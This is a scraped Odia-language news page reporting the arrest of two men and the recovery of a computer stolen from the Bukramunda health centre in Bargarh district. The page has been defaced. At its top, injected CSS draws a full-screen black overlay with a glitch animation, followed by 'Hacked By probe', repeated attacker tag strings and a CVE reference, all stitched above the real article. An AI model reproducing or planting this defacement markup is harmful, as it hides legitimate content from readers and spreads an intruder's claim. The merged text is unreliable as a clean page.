html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMP4RL9UXPK
`58; Hacked By probe `68;
[ HXIMP4rl9uxpk ]
HXIMP4rl9uxpk
CVE-2026-49049 | import vector

ଚୋରି କମ୍ପ୍ୟୁଟର ଉଦ୍ଧାର, ୨ଚୋର ଗିରଫ

User Rating: 4 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Inactive
 

 

ଝାରବନ୍ଧ-ମନୋହ ଦାଶ:ବରଗଡ଼ ଜିଲ୍ଲା ପଦ୍ମପୁର ଉପଖଣ୍ଡ ବୁକ୍ରାମୁଣ୍ଡା ଗୋଷ୍ଠୀ ସ୍ବାସ୍ଥ୍ୟ କେନ୍ଦ୍ର ର ନୁତନ କମ୍ପ୍ୟୁଟର ସେଟ ଗତ ୯/୩ତାରିଖ ରେ ଚୋରି ହୋଇଥିବା ଘଟଣା ସମ୍ପର୍କରେ ଜଗଦଲପୁର ଥାନା ରେ ଅଭିଯୋଗ ହୋଇଥିଲା।ଜଗଦଲପୁର ଥାନାଧିକାରୀ ଲିଲିମାଲଳିତା ବାର୍ଳା ବିଶ୍ୱସ୍ତ ସୂତ୍ରରୁ ଖବର ପାଇ ଦୁଇ ଜଣ ଚୋରଙ୍କୁ ଗିରଫ କରି ସେମାନଙ୍କ ଠାରୁ କମ୍ପ୍ୟୁଟର ଉଦ୍ଧାର କରିଛନ୍ତି।ଗିରଫ ହୋଇଥିବା ମାନେ ହେଲେ ବୁକ୍ରାମୁଣ୍ଡା ଗ୍ରାମର ଅଜୁ ଓରଫ ଅଜୟ ବାରିକ ଓ ପାଇକମାଲ ଥାନା ର ମହୁଳପାଲି ଗ୍ରାମ ର ଦିଲୀପ ସାହୁ ଙ୍କୁ u/s457/380 ଦଫା ରେ ଗିରଫ କରି କୋର୍ଟ ଚାଲାଣ କରାଯାଇଛି ବୋଲି ଶ୍ରୀମତୀ ବାର୍ଳା ସୂଚନା ଦେଇଛନ୍ତି।

0
0
0
s2sdefault